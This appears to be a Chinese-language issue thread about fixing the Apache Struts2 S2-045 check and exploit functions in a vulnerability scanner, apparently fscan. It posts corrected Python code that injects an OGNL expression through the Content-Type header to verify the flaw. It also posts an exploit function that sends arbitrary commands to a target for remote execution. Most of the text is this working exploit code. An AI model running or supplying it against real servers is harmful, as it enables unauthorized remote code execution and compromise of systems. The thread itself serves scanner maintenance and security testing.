ApacheStruts2.py S2-045 poc有错误
self.headers2 = {
'User-Agent': self.ua,
'Content-Type': self.payload_s2_045.replace("RECOMMAND", cmd)
}
try:
self.req= requests.get(self.url, headers=self.headers1, timeout=self.timeout, verify=False)
if r"54289" in self.request.headers['FUCK']:
self.req 应该为 self.request
s2_045_exp 也有问题
s2_046_exp 是正常的。
稍微把 s2_045_exp 按 s2_046_exp 的格式改了一下，就正常了
self.headers2 = {
'User-Agent': self.ua,
'Content-Type': self.payload_s2_045.replace("RECOMMAND", cmd)
}
try:
self.req = requests.get(self.url, headers=self.headers2, timeout=self.timeout, verify=False)
self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
verify.exploit_print(self.req.text, self.raw_data)
感谢 @shadow1ng 师傅的纠正
发现确实 poc 和 exp 都有问题
已经修复 poc 为：
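def s2_045_poc(self):
    """Check the target for Apache Struts2 S2-045 and record the outcome in self.vul_info.

    Two probes are sent, each carrying an OGNL expression in the Content-Type header:
      1. ``self.payload_s2_045`` with RECOMMAND replaced by ``echo <md>``; the check
         passes when the marker ``md`` is found in what ``misinformation()`` returns
         for the response body.
      2. A fallback expression that asks the server to add a response header
         ``FUCK: 233*233``; the check passes when that header contains ``54289``.

    On a positive result ``self.vul_info`` receives ``vul_data`` (the dumped
    request/response), ``prt_resu``, ``vul_payd`` and ``prt_info``; in every
    non-error case the record is handed to ``verify.scan_print``. Timeouts,
    connection failures and any other exception are reported through the
    ``verify`` printers rather than propagated.

    ``self.threadLock`` is held for the duration of the check and released in a
    ``finally`` block, so an interruption that is not an ``Exception`` (e.g.
    KeyboardInterrupt) cannot leave the lock held.
    """
    self.threadLock.acquire()
    try:
        md = random_md5()  # presumably a random token used as the echo marker — confirm in random_md5()
        cmd = "echo " + md
        echo_payload = self.payload_s2_045.replace("RECOMMAND", cmd)
        header_payload = (
            '${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].'
            'addHeader("FUCK",233*233)}.multipart/form-data'
        )
        headers_1 = {'User-Agent': self.ua, 'Content-Type': echo_payload}
        headers_2 = {'User-Agent': self.ua, 'Content-Type': header_payload}
        try:
            # Note: TLS certificate verification is disabled for both probes (verify=False).
            self.request = requests.post(self.url, headers=headers_1,
                                         timeout=self.timeout, verify=False)
            if md in misinformation(self.request.text, md):
                self.vul_info["vul_data"] = dump.dump_all(self.request).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = echo_payload
                self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
            else:
                self.request = requests.post(self.url, headers=headers_2,
                                             timeout=self.timeout, verify=False)
                # .get(): a target that does not echo the header must be reported
                # as "not vulnerable", not as an error — indexing the missing key
                # raised KeyError and fell into the generic handler below.
                if r"54289" in self.request.headers.get('FUCK', ''):
                    self.vul_info["vul_data"] = dump.dump_all(self.request).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoCSuCCeSS"
                    self.vul_info["vul_payd"] = header_payload
                    self.vul_info["prt_info"] = "[rce] [cmd: 233*233]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()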
修复 exp 为：
def s2_045_exp(self, cmd):
    """Send *cmd* to the target through the S2-045 Content-Type payload and print the result.

    The OGNL expression in ``self.payload_s2_045`` is placed in the Content-Type
    header with RECOMMAND replaced by *cmd*. The response object is stored in
    ``self.req`` and a UTF-8 dump of the exchange in ``self.raw_data``; both the
    body text and the dump are passed to ``verify.exploit_print``. Timeouts,
    connection failures and any other exception are reported via the ``verify``
    printers under the name "Apache Struts2: S2-045" instead of being raised.
    """
    vul_name = "Apache Struts2: S2-045"
    content_type = self.payload_s2_045.replace("RECOMMAND", cmd)
    headers = {'User-Agent': self.ua, 'Content-Type': content_type}
    try:
        # Certificate verification is disabled (verify=False), matching the PoC.
        response = requests.post(self.url, headers=headers, timeout=self.timeout, verify=False)
        self.req = response
        self.raw_data = dump.dump_all(response).decode('utf-8', 'ignore')
        verify.exploit_print(response.text, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)
师傅的fscan很强很棒很喜欢